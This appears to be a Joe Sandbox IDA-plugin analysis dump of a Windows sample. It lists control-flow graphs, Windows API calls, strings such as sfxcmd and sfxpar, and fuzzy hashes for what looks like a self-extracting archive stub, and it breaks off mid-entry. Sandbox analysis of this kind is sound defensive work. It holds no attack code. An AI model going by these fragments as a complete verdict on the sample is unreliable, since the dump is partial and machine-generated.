                                • Instruction Fuzzy Hash: FB31D171185343AFE301DF20DC8AFAB7FACEB86744F000519FA51D6291EB644908EBB6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 796 d7ce22-d7ce3a call d7e360 799 d7ce40-d7ce4c call d835b3 796->799 800 d7d08b-d7d093 796->800 799->800 803 d7ce52-d7ce7a call d7f350 799->803 806 d7ce84-d7ce91 803->806 807 d7ce7c 803->807 808 d7ce95-d7ce9e 806->808 809 d7ce93 806->809 807->806 810 d7ced6 808->810 811 d7cea0-d7cea2 808->811 809->808 813 d7ceda-d7cedd 810->813 812 d7ceaa-d7cead 811->812 814 d7ceb3-d7cebb 812->814 815 d7d03c-d7d041 812->815 816 d7cee4-d7cee6 813->816 817 d7cedf-d7cee2 813->817 818 d7d055-d7d05d 814->818 819 d7cec1-d7cec7 814->819 820 d7d036-d7d03a 815->820 821 d7d043 815->821 822 d7cef9-d7cf0e call d6b493 816->822 823 d7cee8-d7ceef 816->823 817->816 817->822 824 d7d065-d7d06d 818->824 825 d7d05f-d7d061 818->825 819->818 828 d7cecd-d7ced4 819->828 820->815 829 d7d048-d7d04c 820->829 821->829 831 d7cf27-d7cf32 call d6a180 822->831 832 d7cf10-d7cf1d call d717ac 822->832 823->822 826 d7cef1 823->826 824->813 825->824 826->822 828->810 828->812 829->818 838 d7cf34-d7cf4b call d6b239 831->838 839 d7cf4f-d7cf5c ShellExecuteExW 831->839 832->831 837 d7cf1f 832->837 837->831 838->839 841 d7cf62-d7cf6f 839->841 842 d7d08a 839->842 843 d7cf82-d7cf84 841->843 844 d7cf71-d7cf78 841->844 842->800 847 d7cf86-d7cf8f 843->847 848 d7cf9b-d7cfba call d7d2e6 843->848 844->843 846 d7cf7a-d7cf80 844->846 846->843 849 d7cff1-d7cffd CloseHandle 846->849 847->848 857 d7cf91-d7cf99 ShowWindow 847->857 848->849 866 d7cfbc-d7cfc4 848->866 850 d7cfff-d7d00c call d717ac 849->850 851 d7d00e-d7d01c 849->851 850->851 863 d7d072 850->863 855 d7d01e-d7d020 851->855 856 d7d079-d7d07b 851->856 855->856 861 d7d022-d7d028 855->861 856->842 860 d7d07d-d7d07f 856->860 857->848 860->842 864 d7d081-d7d084 ShowWindow 860->864 861->856 865 d7d02a-d7d034 861->865 863->856 864->842 865->856 866->849 867 d7cfc6-d7cfd7 GetExitCodeProcess 866->867 867->849 868 d7cfd9-d7cfe3 867->868 869 d7cfe5 868->869 870 d7cfea 868->870 869->870 870->849
                                APIs
                                • ShellExecuteExW.SHELL32(?), ref: 00D7CF54
                                • ShowWindow.USER32(?,00000000), ref: 00D7CF93
                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00D7CFCF
                                • CloseHandle.KERNEL32(?), ref: 00D7CFF5
                                • ShowWindow.USER32(?,00000001), ref: 00D7D084
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                • String ID: $.exe$.inf
                                • API String ID: 3686203788-2452507128
                                • Opcode ID: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                                • Instruction ID: d72e5775f36f80f8e8232802998d86b231efa947896cb1e0aef1ebd638ced57e
                                • Opcode Fuzzy Hash: 4c6c61f791929807e1170daa68b5196682400ec959ac2709040a19bf0e8ef35a
                                • Instruction Fuzzy Hash: 9D61CF70414381DEDB319F249800AABBBF6EF85304F08A91EF5C997255F7B18989CB72

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 871 d8a058-d8a071 872 d8a073-d8a083 call d8e6ed 871->872 873 d8a087-d8a08c 871->873 872->873 883 d8a085 872->883 875 d8a099-d8a0bd MultiByteToWideChar 873->875 876 d8a08e-d8a096 873->876 878 d8a250-d8a263 call d7ec4a 875->878 879 d8a0c3-d8a0cf 875->879 876->875 880 d8a0d1-d8a0e2 879->880 881 d8a123 879->881 884 d8a101-d8a112 call d88518 880->884 885 d8a0e4-d8a0f3 call d91a30 880->885 887 d8a125-d8a127 881->887 883->873 891 d8a245 884->891 897 d8a118 884->897 885->891 896 d8a0f9-d8a0ff 885->896 890 d8a12d-d8a140 MultiByteToWideChar 887->890 887->891 890->891 894 d8a146-d8a158 call d8a72c 890->894 895 d8a247-d8a24e call d8a2c0 891->895 902 d8a15d-d8a161 894->902 895->878 901 d8a11e-d8a121 896->901 897->901 901->887 902->891 903 d8a167-d8a16e 902->903 904 d8a1a8-d8a1b4 903->904 905 d8a170-d8a175 903->905 907 d8a200 904->907 908 d8a1b6-d8a1c7 904->908 905->895 906 d8a17b-d8a17d 905->906 906->891 909 d8a183-d8a19d call d8a72c 906->909 910 d8a202-d8a204 907->910 911 d8a1c9-d8a1d8 call d91a30 908->911 912 d8a1e2-d8a1f3 call d88518 908->912 909->895 924 d8a1a3 909->924 914 d8a23e-d8a244 call d8a2c0 910->914 915 d8a206-d8a21f call d8a72c 910->915 911->914 927 d8a1da-d8a1e0 911->927 912->914 923 d8a1f5 912->923 914->891 915->914 929 d8a221-d8a228 915->929 928 d8a1fb-d8a1fe 923->928 924->891 927->928 928->910 930 d8a22a-d8a22b 929->930 931 d8a264-d8a26a 929->931 932 d8a22c-d8a23c WideCharToMultiByte 930->932 931->932 932->914 933 d8a26c-d8a273 call d8a2c0 932->933 933->895
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D84E35,00D84E35,?,?,?,00D8A2A9,00000001,00000001,3FE85006), ref: 00D8A0B2
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D8A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00D8A138
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D8A232
                                • __freea.LIBCMT ref: 00D8A23F
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                • __freea.LIBCMT ref: 00D8A248
                                • __freea.LIBCMT ref: 00D8A26D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                • String ID:
                                • API String ID: 1414292761-0
                                • Opcode ID: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                                • Instruction ID: a8663e88b0079f40a373188902437d37d2464dd320d4279437ae141679cb3752
                                • Opcode Fuzzy Hash: 28d6b5fd73ac8426761f25cbb000f5c9aaa9c3083a195c6c62bb00f4043eba3e
                                • Instruction Fuzzy Hash: A551DE72600216AFFB35AE68CC41FBB77A9EB41760F19422AFC04D6140EB35DC4087B6

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                • OleInitialize.OLE32(00000000), ref: 00D7A34E
                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                                • SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                • String ID: riched20.dll$3To
                                • API String ID: 3498096277-2168385784
                                • Opcode ID: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                                • Instruction ID: 0167060ecd46d655e43e76fd934871d0ad838b29c15c505dff419613055ce05e
                                • Opcode Fuzzy Hash: f4d63a59d54eac95918c38e36d8225a8a6f8eeec3b4880c760fc4aa2b2026390
                                • Instruction Fuzzy Hash: 7EF0E7B1D0020AABCB10AF99D8499EFFBFCEB95711F00415AE814E2241DBB456098BB1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 940 d699b0-d699d1 call d7e360 943 d699d3-d699d6 940->943 944 d699dc 940->944 943->944 946 d699d8-d699da 943->946 945 d699de-d699fb 944->945 947 d69a03-d69a0d 945->947 948 d699fd 945->948 946->945 949 d69a12-d69a31 call d670bf 947->949 950 d69a0f 947->950 948->947 953 d69a33 949->953 954 d69a39-d69a57 CreateFileW 949->954 950->949 953->954 955 d69abb-d69ac0 954->955 956 d69a59-d69a7b GetLastError call d6b66c 954->956 957 d69ac2-d69ac5 955->957 958 d69ae1-d69af5 955->958 965 d69a7d-d69a9f CreateFileW GetLastError 956->965 966 d69aaa-d69aaf 956->966 957->958 960 d69ac7-d69adb SetFileTime 957->960 961 d69af7-d69b0f call d6fe56 958->961 962 d69b13-d69b1e 958->962 960->958 961->962 969 d69aa5-d69aa8 965->969 970 d69aa1 965->970 966->955 967 d69ab1 966->967 967->955 969->955 969->966 970->969
                                APIs
                                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00D678AD,?,00000005,?,00000011), ref: 00D69A4C
                                • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A59
                                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D678AD,?,00000005,?), ref: 00D69A8E
                                • GetLastError.KERNEL32(?,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69A96
                                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D678AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D69ADB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast$Time
                                • String ID:
                                • API String ID: 1999340476-0
                                • Opcode ID: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                                • Instruction ID: df45e0bcd9f7e63d8a1ad8fda4406a9905c334c66de7dbba18f551ffdc7cd03e
                                • Opcode Fuzzy Hash: 140011471d6d4a92dcabe58b5259a879bfbb98bd4ca31fbfc3d3b55eb1dc86ec
                                • Instruction Fuzzy Hash: D54122705447466FE7208F60CC45BDAFBD8AB05324F14071AF9E8962D1E7B5A988CBB1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 999 d7ac74-d7ac8d PeekMessageW 1000 d7ac8f-d7aca3 GetMessageW 999->1000 1001 d7acc8-d7accc 999->1001 1002 d7aca5-d7acb2 IsDialogMessageW 1000->1002 1003 d7acb4-d7acc2 TranslateMessage DispatchMessageW 1000->1003 1002->1001 1002->1003 1003->1001
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                                • IsDialogMessageW.USER32(0001042C,?), ref: 00D7ACAA
                                • TranslateMessage.USER32(?), ref: 00D7ACB8
                                • DispatchMessageW.USER32(?), ref: 00D7ACC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$DialogDispatchPeekTranslate
                                • String ID:
                                • API String ID: 1266772231-0
                                • Opcode ID: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                                • Instruction ID: 84aad7bb71731be651974bad1cd7dc3e2882380b60158fe5ea5572e3d443fbe6
                                • Opcode Fuzzy Hash: 7dcb53d5de2b028c2ffd02b3ac6fc86e3fea2b1dd26c90df73b06d788333bd8e
                                • Instruction Fuzzy Hash: F7F0BD7190132BAB8B209BE59C4CDEF7F6CEE453917448416F919D2210EA34D505D7B1

                                Control-flow Graph (legend: Executed / Not Executed; nodes are basic-block address ranges with called APIs, edges are source->target)

                                control_flow_graph 1004 d7a2c7-d7a2e6 GetClassNameW 1005 d7a30e-d7a310 1004->1005 1006 d7a2e8-d7a2fd call d717ac 1004->1006 1007 d7a312-d7a315 SHAutoComplete 1005->1007 1008 d7a31b-d7a31f 1005->1008 1011 d7a2ff-d7a30b FindWindowExW 1006->1011 1012 d7a30d 1006->1012 1007->1008 1011->1012 1012->1005
                                APIs
                                • GetClassNameW.USER32(?,?,00000050), ref: 00D7A2DE
                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D7A315
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D7A305
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                • String ID: EDIT
                                • API String ID: 4243998846-3080729518
                                • Opcode ID: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                                • Instruction ID: 450c76c7b65f508e573e35fa707cee0da39d2cdaec8d93de3d55241c4f87a899
                                • Opcode Fuzzy Hash: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                                • Instruction Fuzzy Hash: ADF08232A0132977E7205A689C05FEF776C9B86B50F484156BD49E2280E7609946C6F6

                                Control-flow Graph (legend: Executed / Not Executed; nodes are basic-block address ranges with called APIs, edges are source->target)

                                control_flow_graph 1013 d7d287-d7d2b2 call d7e360 SetEnvironmentVariableW call d6fbd8 1017 d7d2b7-d7d2bb 1013->1017 1018 d7d2df-d7d2e3 1017->1018 1019 d7d2bd-d7d2c1 1017->1019 1020 d7d2ca-d7d2d1 call d6fcf1 1019->1020 1023 d7d2c3-d7d2c9 1020->1023 1024 d7d2d3-d7d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1018
                                APIs
                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: EnvironmentVariable
                                • String ID: sfxcmd$sfxpar
                                • API String ID: 1431749950-3493335439
                                • Opcode ID: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                                • Instruction ID: 6be81edb2da2bd0adcc86ba0cb0132e21e29ad09cd58c478fbcefb8841b13282
                                • Opcode Fuzzy Hash: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                                • Instruction Fuzzy Hash: 7AF0A771801728A7CB212FD4AC0AABA7769EF09741B044562FC8CA6252E661CD41D7F5

                                Control-flow Graph (legend: Executed / Not Executed; nodes are basic-block address ranges with called APIs, edges are source->target)

                                control_flow_graph 1025 d6984e-d6985a 1026 d69867-d6987e ReadFile 1025->1026 1027 d6985c-d69864 GetStdHandle 1025->1027 1028 d69880-d69889 call d69989 1026->1028 1029 d698da 1026->1029 1027->1026 1033 d698a2-d698a6 1028->1033 1034 d6988b-d69893 1028->1034 1031 d698dd-d698e2 1029->1031 1036 d698b7-d698bb 1033->1036 1037 d698a8-d698b1 GetLastError 1033->1037 1034->1033 1035 d69895 1034->1035 1038 d69896-d698a0 call d6984e 1035->1038 1040 d698d5-d698d8 1036->1040 1041 d698bd-d698c5 1036->1041 1037->1036 1039 d698b3-d698b5 1037->1039 1038->1031 1039->1031 1040->1031 1041->1040 1043 d698c7-d698d0 GetLastError 1041->1043 1043->1040 1045 d698d2-d698d3 1043->1045 1045->1038
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00D6985E
                                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D69876
                                • GetLastError.KERNEL32 ref: 00D698A8
                                • GetLastError.KERNEL32 ref: 00D698C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLast$FileHandleRead
                                • String ID:
                                • API String ID: 2244327787-0
                                • Opcode ID: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                                • Instruction ID: 263790307c04b6f6f5ace4e8d251986082cbaf7095d447ed8906b98d66307d76
                                • Opcode Fuzzy Hash: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                                • Instruction Fuzzy Hash: FD117C30900204EBDB209F51C824A79B7ACEB06771F14862AF86AC7690D735DE489F71
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D83713,00000000,00000000,?,00D8A49B,00D83713,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue), ref: 00D8A526
                                • GetLastError.KERNEL32(?,00D8A49B,00D83713,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000,00000364,?,00D89077), ref: 00D8A532
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8A49B,00D83713,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000), ref: 00D8A540
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                                • Instruction ID: fd72f8855906b274747b9be08f6249ce49ef17ff3ef7b2a733773c4c5f8bca52
                                • Opcode Fuzzy Hash: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                                • Instruction Fuzzy Hash: FB01F736611323ABD7219A6C9C44E567B58AF45BA17140563F90AD3240D731DD40C7F1
                                APIs
                                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00D6CC94,00000001,?,?,?,00000000,00D74ECD,?,?,?), ref: 00D69F4C
                                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00D74ECD,?,?,?,?,?,00D74972,?), ref: 00D69F8E
                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00D6CC94,00000001,?,?), ref: 00D69FB8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileWrite$Handle
                                • String ID:
                                • API String ID: 4209713984-0
                                • Opcode ID: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                                • Instruction ID: 12af2403f7002c85b895a180580d12a5de5ef5a30ba585761da6cc78523c641f
                                • Opcode Fuzzy Hash: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                                • Instruction Fuzzy Hash: 5331E2712083059BDF208F28D858B6AFBA8EF91710F084559F885EB285C775DD49CBB2
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A22E
                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A261
                                • GetLastError.KERNEL32(?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A27E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CreateDirectory$ErrorLast
                                • String ID:
                                • API String ID: 2485089472-0
                                • Opcode ID: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                                • Instruction ID: 0dc2b45a7e1c8ba7e4dbbc58a7079684b7982b911762bbac5a1e691b3a1100a4
                                • Opcode Fuzzy Hash: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                                • Instruction Fuzzy Hash: 320180311C121467DB229BAD4C55BE97348AF1F781F085452F885F9051DB66CA818EBB
                                APIs
                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D8B019
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
